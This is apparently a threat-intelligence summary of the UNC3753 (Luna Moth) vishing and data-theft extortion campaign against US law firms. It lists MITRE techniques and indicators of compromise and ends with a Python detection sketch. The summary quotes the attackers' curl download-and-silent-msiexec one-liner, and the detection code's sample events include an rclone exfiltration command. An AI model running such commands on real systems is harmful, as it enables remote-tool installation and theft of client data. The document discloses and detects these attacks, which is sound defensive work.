Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms

Mandiant reported that UNC3753, also known as Luna Moth, Chatty Spider, and Silent Ransom Group, ran a fast-moving data theft extortion campaign against U.S. professional, legal, and financial services organizations by using vishing, screen-sharing, RMM tools, and sometimes physical office access. The group stole sensitive data such as legal agreements, PII, and financial records, then used extortion emails and the LEAKEDDATA site to pressure victims into paying. #UNC3753 #LunaMoth #ChattySpider #SilentRansomGroup #LEAKEDDATA

Keypoints

  • UNC3753 targeted dozens of U.S. organizations in professional, legal, and financial services from January through May 2026.
  • The group relied on voice phishing and IT helpdesk impersonation to convince victims to join screen-sharing sessions and install remote access tools.
  • Attackers used benign invoice-themed emails, Privnote messages, and commercial RMM tools such as AnyDesk, Bomgar, Zoho Assist, and SuperOps to gain and maintain access.
  • Once inside, they searched file systems, OneDrive, iManage, and network drives to stage and steal sensitive documents, including PII, tax forms, and client agreements.
  • Exfiltration was carried out through WinSCP, Rclone, consumer file-sharing accounts, Gmail-like email forwarding, and cloud storage uploads.
  • Mandiant also assessed that some associated actors attempted physical office intrusion and direct USB-based theft from endpoints.
  • The group followed the data theft with aggressive extortion emails and threats to publish the stolen data on the LEAKEDDATA data leak site.

MITRE Techniques

  • [T1566.004] Phishing: Spearphishing Voice – Used vishing calls while impersonating IT staff to direct victims into screen-sharing sessions and remote access setup (‘acting as members of the organization’s internal IT helpdesk or security team, threat actors place direct calls’).
  • [T1133] External Remote Services – Gained access through remote desktop/support services and VDI/VPN-enabled remote environments (‘join a screen-sharing session’ and access corporate VDI).
  • [T1204.002] User Execution: Malicious File – Tricked users into downloading and executing installers and payloads such as RMM agents (‘convincing the target to download and execute a payload’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Inferred from the article’s MITRE list and from remote execution activity that used scripted administrative actions (‘download and execute a payload via a cURL command’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Used command-line execution to launch installers and scripts (‘curl -sL … -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet’).
  • [T1569.002] System Services: Service Execution – Installed software through system service-based execution such as MSI installation (‘msiexec /i “SuperOps.msi” /quiet’).
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Listed as a technique in the campaign’s MITRE mapping, indicating use of scheduled execution for persistence (‘Scheduled Task/Job: Scheduled Task’).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys – Listed as a persistence method in the MITRE mapping (‘Registry Run Keys’).
  • [T1036.005] Masquerading: Match Legitimate Name or Location – Used brand-like folder names and legitimate-looking lures to blend in (‘folders explicitly renamed to mimic the victim organization’s branding’).
  • [T1553.002] Subvert Trust Controls: Code Signing – Listed in the MITRE mapping, indicating abuse of trusted software or signed binaries (‘Subvert Trust Controls: Code Signing’).
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Attempted to evade controls by using tools and methods that bypass endpoint restrictions (‘bypass conventional automated boundary security and email filtering controls’).
  • [T1070.001] Indicator Removal: Clear Windows Event Logs – Listed in the MITRE mapping, suggesting log cleanup to hide activity (‘Clear Windows Event Logs’).
  • [T1003.001] OS Credential Dumping: LSASS Memory – Listed in the MITRE mapping as a credential access technique (‘LSASS Memory’).
  • [T1003.002] OS Credential Dumping: Security Account Manager – Listed in the MITRE mapping as another credential dumping technique (‘Security Account Manager’).
  • [T1083] File and Directory Discovery – Enumerated local directories, OneDrive folders, and network drives to find valuable data (‘map local directories, enumerate active OneDrive folders, and crawl mapped network drives’).
  • [T1135] Network Share Discovery – Searched mapped network drives and shared resources to locate target repositories (‘crawl mapped network drives’).
  • [T1046] Network Service Discovery – Listed in the MITRE mapping, consistent with discovery of accessible services and network paths (‘Network Service Discovery’).
  • [T1219] Remote Access Software – Abused commercial remote access tools such as AnyDesk, Bomgar, Zoho Assist, Zoom, Teams, and Quick Assist (‘download AnyDesk, Bomgar, or Zoho Assist installers’).
  • [T1021.001] Remote Services: Remote Desktop Protocol – Used native remote desktop/virtual desktop services during access and pivoting (‘Microsoft Terminal Services’ and VDI sessions).
  • [T1021.004] Remote Services: SSH – Used SSH-based transfer tools during exfiltration; the report’s hunting guidance is to ‘Monitor SSH traffic (Port 22) from internal VDIs’.
  • [T1005] Data from Local System – Collected files from local endpoints, Downloads folders, Roaming profiles, and OneDrive (‘staged results are compiled … inside the user’s Downloads folder’).
  • [T1572] Protocol Tunneling – Listed in the MITRE mapping, indicating use of network tunneling or relayed channels (‘Protocol Tunneling’).
  • [T1020] Automated Exfiltration – Automated large-scale transfers with tools like WinSCP and Rclone (‘frequently use portable versions of WinSCP or Rclone’).
  • [T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage – Uploaded stolen data to Google Drive and consumer file-sharing accounts (‘batch upload the stolen files’).
  • [T1052.001] Exfiltration Over Physical Medium – Attempted to copy data to USB storage during in-person office access (‘exfiltrate corporate data directly to an external drive’).
  • [T1486] Data Encrypted for Impact – Listed in the MITRE section, though the campaign described focused on extortion rather than encryption (‘Data Encrypted for Impact’).

Indicators of Compromise

  • [IPv4 Address] IOC collection associated with UNC3753 infrastructure – 192.236.147.131, 192.236.147.138, and 5 other addresses
  • [Domain] Data leak site and phishing infrastructure – business-data-leaks[.]com, privnote[.]com
  • [Phishing domain pattern] Actor-registered IT/helpdesk-themed domains used for social engineering – -itdesk[.]com, -helpdesk[.]com, and other similar domains
  • [File name / installer] Payload staging and remote access installation – SuperOps.msi, AnyDesk, Bomgar, and Zoho Assist installers
  • [Command / URL] cURL-based download and MSI execution string used in remote sessions – curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet
  • [Threat-hunting rule names] Google SecOps detections for this activity – Execute MSI Files Downloaded via Curl, Suspected Rclone Exfiltration
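As an added defensive example (not code from the Mandiant report or from Google SecOps), the two rule names above can be approximated as correlation logic over process-creation events: a curl-fetched .msi installed by msiexec /quiet on the same host within a short window, and an rclone copy/sync/move to a cloud remote. The event layout, hostnames, user names and the 192.0.2.10 address are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (not from the report). Fields:
# (timestamp, host, user, image, command_line). 192.0.2.10 is a placeholder.
SAMPLE_EVENTS = [
    ("2026-03-02T14:01:10Z", "WS-LAW-07", "jdoe", "cmd.exe",
     'curl -sL "http://192.0.2.10/installer" -o "SuperOps.msi" '
     '&& msiexec /i "SuperOps.msi" /quiet'),
    ("2026-03-02T15:20:33Z", "WS-LAW-07", "jdoe", "rclone.exe",
     "rclone copy C:\\Users\\jdoe\\Downloads\\Staging gdrive:clients --transfers 8"),
    ("2026-03-02T09:10:00Z", "WS-IT-01", "svc_patch", "msiexec.exe",
     'msiexec /i "C:\\Patches\\agent.msi" /quiet /norestart'),  # routine, no curl
    ("2026-03-03T10:00:05Z", "WS-LAW-12", "asmith", "cmd.exe",
     'curl -sL "http://192.0.2.10/support" -o "Support.msi"'),
    ("2026-03-03T10:03:40Z", "WS-LAW-12", "asmith", "msiexec.exe",
     'msiexec /i "Support.msi" /quiet'),
]

CURL_OUT = re.compile(r'\bcurl\b.*?\s-o\s+"?([^"\s]+\.msi)"?', re.I)
MSI_INSTALL = re.compile(r'\bmsiexec(?:\.exe)?\b.*?\s/i\s+"?([^"\s]+\.msi)"?', re.I)
RCLONE_OP = re.compile(r'\brclone(?:\.exe)?\s+(?:copy|sync|move)\b', re.I)
REMOTE_ARG = re.compile(r'(?<!\S)[A-Za-z0-9_-]{2,}:\S*')  # remote:path, not C:\

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(events, window=timedelta(minutes=10)):
    """Return [(rule, host, user, timestamp)] for the two behaviours above."""
    alerts = []
    downloads = {}  # (host, msi basename) -> time curl wrote it
    for ts, host, user, image, cmd in sorted(events, key=lambda e: e[0]):
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        m = CURL_OUT.search(cmd)
        if m:  # remember what curl dropped so a later msiexec can be correlated
            downloads[(host, _basename(m.group(1)))] = when
        m = MSI_INSTALL.search(cmd)
        if m and "/quiet" in cmd.lower():
            fetched = downloads.get((host, _basename(m.group(1))))
            if fetched is not None and when - fetched <= window:
                alerts.append(("Execute MSI Files Downloaded via Curl", host, user, ts))
        if RCLONE_OP.search(cmd) and REMOTE_ARG.search(cmd):
            alerts.append(("Suspected Rclone Exfiltration", host, user, ts))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The chained one-liner and the split curl/msiexec pair both fire the first rule, while the routine patch install on WS-IT-01 does not because no curl download preceded it.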


Read more: https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms/